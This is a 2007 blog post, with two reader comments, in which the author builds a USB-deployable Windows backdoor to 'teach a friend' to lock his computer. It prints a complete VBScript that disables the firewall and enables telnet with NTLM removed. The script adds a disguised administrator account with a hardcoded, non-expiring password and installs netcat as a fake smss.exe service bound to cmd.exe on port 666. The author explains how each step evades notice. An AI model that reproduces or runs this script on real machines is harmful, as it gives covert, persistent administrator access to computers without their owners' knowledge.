Creative Commons

2007-05-23 13:18:43

One way you've probably been owned

This all stemmed from wanting to teach a friend at school a lesson: lock your computer! Quite regularly this person would get up and leave his computer unattended and unlocked. So what would a friend like me do? Tell him to lock his computer? I've already done that many times. This time, he needed to learn a lesson. I was gonna backdoor his system so every once in a while he's get a random file created on his desktop. That would be enough to spark the paranoia.
What does this have to do with you though? Hold your horses. Since you can never tell how long he would be away from his computer, I need a quick way to get in, deliver the payload, and get out. I decided to write a VBScript that would do everything for me. So what was I going to do? I decided there were a few things I'd like to accomplish. I wanted to open telnet, which required a local user be created. I also wanted to backdoor the machine with netcat so that every time he boots, his machine listens for a connection. So the resulting VBScript is what I came up with:
On Error Resume Next Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set wshShell = WScript.CreateObject ("") Set FSO = CreateObject("Scripting.FileSystemObject") Set objNetwork = CreateObject("Wscript.Network") Wscript.Echo "" Wscript.Echo "Stopping and disabling the windows firewall" Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='SharedAccess'") For Each objService in colListOfServices objService.StopService() objService.Change , , , , "Disabled" Next Wscript.echo "Windows firewall stopped/disabled" Wscript.Echo "" Wscript.Echo "Enabling/configuring/starting telnet" Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='TlntSvr'") For Each objService in colListOfServices objService.Change , , , , "Automatic" wshShell.Run "tlntadmn config sec=-NTLM",1,True objService.StartService() Next Wscript.Echo "Telnet enabled/configured/started" Wscript.Echo "" Wscript.Echo "Adding local user IUSER_localhost as an administrator with a non-expiring password" strComputer = objNetwork.ComputerName Set colAccounts = GetObject("WinNT://" & strComputer) Set objUser = colAccounts.Create("user", "IUSER_localhost") objUser.SetPassword "abcABC123" objUser.SetInfo Set objGroup = GetObject("WinNT://" & strComputer & "/Administrators,group") Set objUser = GetObject("WinNT://" & strComputer & "/IUSER_localhost,user") objGroup.Add(objUser.ADsPath) objUser.Put "userFlags", &h10000 objUser.SetInfo Wscript.Echo "Local user created" Wscript.Echo "" Wscript.Echo "Copying netcat to local system" FSO.CopyFile "nc.exe","C:\Windows\smss.exe",True Wscript.Echo "Netcat copied" Wscript.Echo "" Wscript.Echo "Creating/starting service for netcat" Set objService = objWMIService.Get("Win32_BaseService") objService.Create "rpcown","Remote Procedure Call (RPC) Ownership","C:\Windows\smss.exe -d -L -p 666 -e cmd.exe",16,0,"Automatic",False Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='rpcown'") For Each objService in colListOfServices objService.StartService() Next Wscript.Echo "Service created/started" Wscript.Echo "" Set FSO = Nothing Set objUser = Nothing Set objGroup = Nothing Set colAccounts = Nothing Set colListOfServices = Nothing Set objService = Nothing Set objNetwork = Nothing Set objWMIService = Nothing Set wshShell = Nothing Wscript.Echo "Pwn c0mp|373"
Ok, so what does that do? In order for telnet to work, I needed the builtin Windows Firewall to be off since it blocks port 23 connections by default. The first section shuts off and disables the firewall.
Then I wanted to turn on telnet. By default, telnetting to a Windows machine from a Windows machine doesn't work. There are a few reasons for this. Telnet, by default, attempts to use NTLM as the authentication mechanism, which means that you will not get prompted to enter your username, telnet will try to pass the username which you used to login to your workstation. We can't do that, because our username doesn't have rights on the remote machine. So the second section enables telnet, removes NTLM from the authentication mechanism list, and starts the service.
We still have the problem about our account not having access to the remote machine. Now that NTLM is disabled, we'll get prompted for a username and password when we try to telnet, so now we need an account to use. The next section creates the user IUSER_localhost, adds it to the local Administrators group, and makes the password never expire. Why did I choose the username IUSER_localhost? Well, if you have the IIS webserver installed on your machine you'll have an IUSR_computername account already there. I chose IUSER_localhost to kinda sorta mimmick that account, so if someone is just glancing at their user list, it won't stick out as an intruder.
Next is planting the netcat binary. You'll notice that I'm copying it to the Windows directory with the name smss.exe. Why is that? Well, here's the answer to why this post affects you. smss.exe is a system binary, normally located in the system32 directory. It, along with a few other binaries cannot be killed via the task manager because Windows considers them critical system processes. But their logic is flawed, because not only can't the real smss.exe be killed, but any process anywhere on your hard drive with the same name can't be killed. Windows can't differentiate the real smss.exe from a fake one. So by copying netcat to smss.exe, once I run it, it can't be killed by conventional means. This is how some virus writers infect your machine with processes that can't be killed. I should note, to keep you from spinning your wheels as I did, that the -e option will not work unless the netcat binary was compiled with the GAPING_SECURITY_HOLE.
The last section is so that every time my friend turns on his machine, the backdoor gets opened. I create a service, named Remote Procedure Call (RPC) Ownership, and start it. Now, this is just like the user creation, where I name the service something that most people will just glance over. There are already two RPC services installed on Windows machines, who's going to notice a third?
NOTE: Even though the -d option was used to start netcat, the program doesn't properly daemonize itself. If you start it from a command prompt and close the prompt, netcat will continue to run. But if you start it from a command prompt it should return and give you the console back, which it doesn't. For this reason, the service we just created can't start because it's expecting netcat to return with some return code but it never does. I'm still working on this part...
So, I hope someone has learned from this little exercise. Before I started, I didn't realize how virus writers made their processes unkillable. Now I know, and now you do too. To quote Peter Parker's uncle, "With great power comes great responsibility." In other words, don't do anything stupid.



2007-11-24 17:48:42

slider says...
I was just wondering what all this accomplished, to what end did this freind have trouble with their computer? What was the end result of all your work?

2007-11-24 18:28:04

slonkak says...
My friend never ended up having trouble, because I showed him what I had done and how simple it was for me to do it, thus proving the point that you need to take security seriously, starting at the easiest thing to do, locking your screen. The end result was a backdoor that I could put on a USB stick, execute on someone's computer (unlocked, of course) and have it wait for me to connect. It's the same basic principle of the zombie networks you hear about today, except my couple hours of programming is nothing compared to the sophistication of real malware in the wild.

Post a comment!